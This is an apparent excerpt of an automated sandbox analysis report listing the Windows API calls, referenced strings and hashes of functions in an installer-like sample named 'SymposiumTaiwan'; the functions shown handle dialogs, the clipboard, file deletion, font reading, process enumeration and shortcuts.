                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                              • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                                • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042634C,762323A0,00000000), ref: 00406902
                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                              • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                              • CreateThread.KERNEL32(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                              • CloseHandle.KERNEL32(00000000), ref: 004052EC
                                              • ShowWindow.USER32(00000000), ref: 00405313
                                              • ShowWindow.USER32(?,00000008), ref: 00405318
                                              • ShowWindow.USER32(00000008), ref: 0040535F
                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                              • CreatePopupMenu.USER32 ref: 004053A2
                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                              • GetWindowRect.USER32(?,?), ref: 004053CA
                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                              • OpenClipboard.USER32(00000000), ref: 00405437
                                              • EmptyClipboard.USER32 ref: 0040543D
                                              • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                              • GlobalLock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405453
                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                              • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405489
                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                              • CloseClipboard.USER32 ref: 0040549A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                              • String ID: New install of "%s" to "%s"${
                                              • API String ID: 2110491804-1641061399
                                              • Opcode ID: b870e07e0f90b65775997a4172df4cb72c50b11c5a38a9ad208b9f3c2b6ee9f0
                                              • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                              • Opcode Fuzzy Hash: b870e07e0f90b65775997a4172df4cb72c50b11c5a38a9ad208b9f3c2b6ee9f0
                                              • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58
                                              APIs
                                              • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                              • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                              • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                              • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                              • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                              • DeleteObject.GDI32(?), ref: 00404AA5
                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                              • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                              • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                              • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                              • GlobalFree.KERNEL32(?), ref: 00404DD8
                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                              • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                              • ShowWindow.USER32(?,00000000), ref: 00404F75
                                              • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                              • ShowWindow.USER32(00000000), ref: 00404F87
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                              • String ID: $ @$M$N
                                              • API String ID: 1638840714-3479655940
                                              • Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                              • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                              • Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                              • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                              APIs
                                              • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                              • lstrcatW.KERNEL32(00467470,\*.*), ref: 00406D35
                                              • lstrcatW.KERNEL32(?,00409838), ref: 00406D55
                                              • lstrlenW.KERNEL32(?), ref: 00406D58
                                              • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                              • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                              • FindClose.KERNEL32(?), ref: 00406E5F
                                              Strings
                                              • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                              • ptF, xrefs: 00406D1A
                                              • \*.*, xrefs: 00406D2F
                                              • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                              • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                              • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                              • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                              • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                              • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd
                                              Similarity
                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                              • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                              • API String ID: 2035342205-1650287579
                                              • Opcode ID: 0773e1bb02d94fce99ad1c6111755f8979c63676e37ea285c86d1b4844ce1413
                                              • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                              • Opcode Fuzzy Hash: 0773e1bb02d94fce99ad1c6111755f8979c63676e37ea285c86d1b4844ce1413
                                              • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                              APIs
                                              • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                              • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                              • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                              • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                              • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                              • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                              • SetWindowTextW.USER32(?,?), ref: 004045AF
                                              • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                              • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                              • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                              • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000), ref: 00403EBB
                                              • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042634C,762323A0,00000000), ref: 00406902
                                              • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd
                                              Similarity
                                              • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                              • String ID: F$A
                                              • API String ID: 3347642858-1281894373
                                              • Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                              • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                              • Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                              • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                              APIs
                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                              • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                              • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                              • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                              • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                              • CloseHandle.KERNEL32(?), ref: 00407212
                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd
                                              Similarity
                                              • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                              • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                              • API String ID: 1916479912-1189179171
                                              • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                              • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                              • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                              • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                              APIs
                                              • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                              Strings
                                              • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd
                                              Similarity
                                              • API ID: CreateInstance
                                              • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                              • API String ID: 542301482-1377821865
                                              • Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                              • Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
                                              • Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                              • Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
                                              APIs
                                              • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                              • lstrlenW.KERNEL32(?), ref: 004063F8
                                              • GetVersionExW.KERNEL32(?), ref: 00406456
                                                • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                              • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                              • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                              • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                              • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                              • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                              • GlobalFree.KERNEL32(?), ref: 00406509
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd
                                              Similarity
                                              • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                              • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                              • API String ID: 20674999-2124804629
                                              • Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                              • Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
                                              • Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                              • Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
                                              APIs
                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                              • ShowWindow.USER32(?), ref: 004054FE
                                              • DestroyWindow.USER32 ref: 00405512
                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                              • GetDlgItem.USER32(?,?), ref: 0040554F
                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                              • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                              • GetDlgItem.USER32(?,00000001), ref: 00405619
                                              • GetDlgItem.USER32(?,00000002), ref: 00405623
                                              • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                              • GetDlgItem.USER32(?,00000003), ref: 00405734
                                              • ShowWindow.USER32(00000000,?), ref: 00405756
                                              • EnableWindow.USER32(?,?), ref: 00405768
                                              • EnableWindow.USER32(?,?), ref: 00405783
                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                              • EnableMenuItem.USER32(00000000), ref: 004057A0
                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                              • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                              • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                              • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd
                                              Similarity
                                              • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                              • String ID:
                                              • API String ID: 184305955-0
                                              • Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                              • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                              • Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                              • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E
                                              APIs
                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                              • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                              • GetSysColor.USER32(?), ref: 004041DB
                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                              • lstrlenW.KERNEL32(?), ref: 00404202
                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                                • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                                • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                                • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                              • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                              • SendMessageW.USER32(00000000), ref: 0040427D
                                              • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                              • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                              • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                              • SetCursor.USER32(00000000), ref: 004042FE
                                              • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                              • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                              • SetCursor.USER32(00000000), ref: 00404322
                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd
                                              Similarity
                                              • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                              • String ID: F$N$open
                                              • API String ID: 3928313111-1104729357
                                              • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                              • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                              • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                              • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                              APIs
                                              • lstrcpyW.KERNEL32(00465E20,NUL), ref: 00406AD5
                                              • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                              • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                              • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
